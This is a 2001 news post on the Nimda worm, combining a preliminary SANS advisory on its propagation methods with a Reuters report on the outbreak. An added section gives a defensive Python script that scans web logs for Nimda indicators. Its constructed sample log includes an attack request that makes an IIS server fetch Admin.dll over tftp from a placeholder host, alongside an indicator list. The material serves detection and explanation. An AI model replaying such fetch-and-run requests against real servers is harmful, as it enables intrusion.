
New IIS "Concept Virus" Worm: NIMDA Propagating Quickly

posted on September 19, 2001
by hitbsecnews

Editor's Note: Perhaps the scariest aspect of this particular worm is its reported ability to
infect users who simply view a webpage with Microsoft's Internet Explorer on an infected
server.

SANS Institute release:

Nimda Worm
Version 0.1 - September 18, 2001
New IIS "Concept Virus" Worm: NIMDA Propagating Quickly

UPDATE SUMMARY: A new worm that has been named "Nimda" is propagating with unprecedented speed
across the Internet. The worm appears to have at least four distinct propagation mechanisms.

****INFORMATION IS PRELIMINARY****

(1) An IIS vulnerability propagation mechanism where the worm
attempts to exploit a large number of IIS vulnerabilities to gain
control of a victim IIS server. Once in control, the worm uses tftp
to fetch its code in a file called Admin.dll from the attacking server.

(2) The worm harvests email addresses from the address book and
potentially the web browser history and sends itself to all addresses
as an attachment called readme.exe. Note that the worm may spoof
the source address on the emails, some have even been received at
incidents.org with source addresses of codered@sans.org and
webmaster@incidents.org. Other reports indicate that the
spoofed source address of staff@attrition.org has also been seen.
It is possible that someone is spoofing these emails intentionally,
so that people will trust the source addresses as they are security
sites.

(3) When a web server is infected, the worm downloads a binary
encoded as a wav file to each client that connects to the server.
The wav file is called readme.eml. Microsoft Internet Explorer will
automatically execute the malicious file.

(4) The worm is network aware and propagates via open shares. It
will propagate to shares that are accessible to username guest
with no password.

The worm appears to prefer to target its neighbors, Code Red II
style, when scanning for vulnerable IIS servers. This can cause
considerable activity on local networks that have several
infected machines.

...

Evidently, a new worm is the source of the activity. Once the
worm gains access to a vulnerable IIS webserver, it uses tftp to
fetch a binary called Admin.dll from the infecting host.

...

Also, connecting to an infected webserver using a web
browser results in an attempt to download an executable called
readme.eml. Reports indicate that IE5 will automatically
execute the program, which appears to be mime encoded as a
wav file. The worm forces readme.eml to be sent to each client
that accesses any page on the infected webserver.

...

Other reports indicate that the worm will email itself to addresses in the
victim machine's address book as an attachment called readme.exe. Further,
the worm appears to be harvesting email addresses from cached web pages.
An example of the subject line of an email carrying the malicious readme.exe
program is below:

-------------
From: infected, infected@infected.com
Subject: Øò^Rdesktopdesktopsamplesampledesktopsampledesktopsamplesampledesktop
desktopdesktopdesktopsampledesktopdesktopsampledesktopdesktopdesktop
sampledesktopdesktopsampledesktopsampledesktopsampledesktopsampl
To: recipient, recipient@recipient.org
----------------

The worm is also said to propagate via open network shares or
shares that allow connections via the username guest with no password.

All files are currently under analysis. This information is preliminary.
More information will be posted as soon as it becomes available.
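A defender-side triage of web-server access logs for the indicators the advisory names (requests referencing Admin.dll or tftp for mechanism (1), and clients being fed readme.eml for mechanism (3)), with per-source counts and a same-/24 "neighbour" flag for the Code Red II-style local scanning described above. This is an added example, not code from the SANS release or from incidents.org; the log lines, addresses and the W3C field layout are constructed sample data.

```python
"""Triage of web-server access logs for the Nimda indicators named in the
SANS advisory: requests referencing Admin.dll/tftp (mechanism 1) and clients
being served readme.eml (mechanism 3). All sample data below is constructed."""
import ipaddress
from collections import Counter

# Indicator strings taken from the advisory text (matched case-insensitively).
INDICATORS = ("admin.dll", "readme.eml", "readme.exe", "tftp")

# Constructed sample lines in W3C extended format:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-09-18 14:02:11 192.0.2.17 GET /index.html - 200
2001-09-18 14:02:13 192.0.2.44 GET /scripts/run.exe tftp+-i+192.0.2.44+GET+Admin.dll 404
2001-09-18 14:02:14 192.0.2.44 GET /scripts/Admin.dll - 404
2001-09-18 14:02:20 198.51.100.9 GET /readme.eml - 200
2001-09-18 14:02:22 192.0.2.44 GET /MSADC/Admin.dll - 404
2001-09-18 14:03:01 192.0.2.17 GET /about.html - 200
"""


def parse_line(line):
    """Split one W3C line into its seven fields; return None if malformed."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, c_ip, method, stem, query, status = parts
    return {"ip": c_ip, "method": method, "stem": stem,
            "query": "" if query == "-" else query, "status": status}


def triage(log_text, server_ip):
    """Return (hits, per_source): flagged records (with the indicators matched
    and whether the client sits in the server's /24) and hit counts per client.
    A 200 for /readme.eml from your own server suggests the server itself is
    infected and is feeding the file to visitors (mechanism 3)."""
    server_net = ipaddress.ip_network(f"{server_ip}/24", strict=False)
    hits, per_source = [], Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        haystack = (rec["stem"] + "?" + rec["query"]).lower()
        matched = [ind for ind in INDICATORS if ind in haystack]
        if not matched:
            continue
        rec["indicators"] = matched
        rec["neighbour"] = ipaddress.ip_address(rec["ip"]) in server_net
        hits.append(rec)
        per_source[rec["ip"]] += 1
    return hits, per_source
```

Sources with many hits inside the server's own /24 are the local infected machines the advisory warns will saturate the LAN; a single remote source with one readme.eml hit is a visitor, not an attacker.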

Tom Liston has posted some preliminary analysis here:
http://www.incidents.org/archives/intrusions/msg01765.html

Links to AV vendor sites on the topic are here:

Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

NAI
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

F-Secure
http://www.f-secure.com/v-descs/nimda.shtml

Symantec
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

To read more technical information about this issue, please see: http://www.incidents.org/react/nimda.php

Also see: http://www.nipc.gov/warnings/advisories/2001/01-022.htm

------------------------------------------

Nimda Computer Worm Hits Worldwide
Updated: Tue, Sep 18 4:33 PM EDT
By Duncan Martell

SAN FRANCISCO (Reuters) - A damaging new computer worm was spreading like wildfire across the Internet on Tuesday, hitting both home PC users and commercial servers, in an outbreak that could prove more widespread and costly than the Code Red viruses, computer security experts said.

Known as "Nimda," which spells admin backwards, the worm spreads by sending infected e-mails and also appears able to infect Web sites, so when a user visits a compromised Web site, the browser -- if it has not been patched -- can spread the worm to a PC, analysts said.

So far, it appears that Nimda arrives in e-mail without a subject line and containing an attachment titled "readme.exe," experts said.

Internet security experts have warned of the potential for an increase in virus activity after last week's attacks on the World Trade Center and Pentagon, but U.S. Attorney General John Ashcroft said there was no sign the outbreak was linked to those events.

"There is no evidence at this time which links this infection to the terrorist attacks of last week," Ashcroft told a news briefing.

The worm may have started as early as Monday and was showing signs of overloading traffic on the Internet, Ashcroft said, saying that Nimda proved "heavier" than the Code Red worm that caused an estimated $2.6 billion in clean-up costs on Internet-linked computers after outbreaks in July and August.

"Compared to Code Red, it may well be bigger simply because it can affect home users as well," said Graham Cluley, senior technical consultant for Sophos Antivirus.

If Microsoft Corp.'s Outlook e-mail program has not been patched with an update that became available in March, the recipient does not even need to open the attachment to activate the virus -- opening the e-mail itself is sufficient -- said Vincent Weafer, senior director of Symantec Corp.'s Symantec Security Response unit.

Other e-mail programs, such as Eudora or International Business Machines Corp.'s Lotus Notes, require the recipient to open the attachment for the virus to replicate, he said.

So far, the malicious program does not appear capable of erasing files or data, but Nimda has shown itself capable of slowing down computer operations as it replicates, experts said.

"In terms of data destruction, we haven't seen anything," Weafer said.

Experts said Nimda had appeared in the United States, Europe and Latin America and was likely to spread to other regions as well.

"It seems to be very widespread and (moves) at an incredibly quick rate," Cluley said. "The reason it's become so widespread is because it not only travels via e-mail but it contaminates Web sites as well."

The worm exploits an already detected vulnerability in Microsoft's Internet Information Server Web software running on Windows NT or 2000 machines, the same breach that the Code Red viruses exploited, experts said.

Once Nimda infects a machine, it tries to replicate in three ways. It has its own e-mail engine and will try to send itself out using addresses stored in e-mail programs. It also scans IIS servers looking for the known vulnerability and attacks those servers. Finally, it looks for shared disk drives and tries to replicate itself to those devices, Symantec's Weafer said.

Experts urged companies and users to update antivirus software and to download the software patches, noting the principal reason the worm had spread so quickly was that people and companies had not downloaded the free software patches.

Patches are available for both the IIS vulnerability and Web browsers at http://www.microsoft.com/security.

Source: http://news.excite.com/news/r/010918/16/news-tech-worm-dc
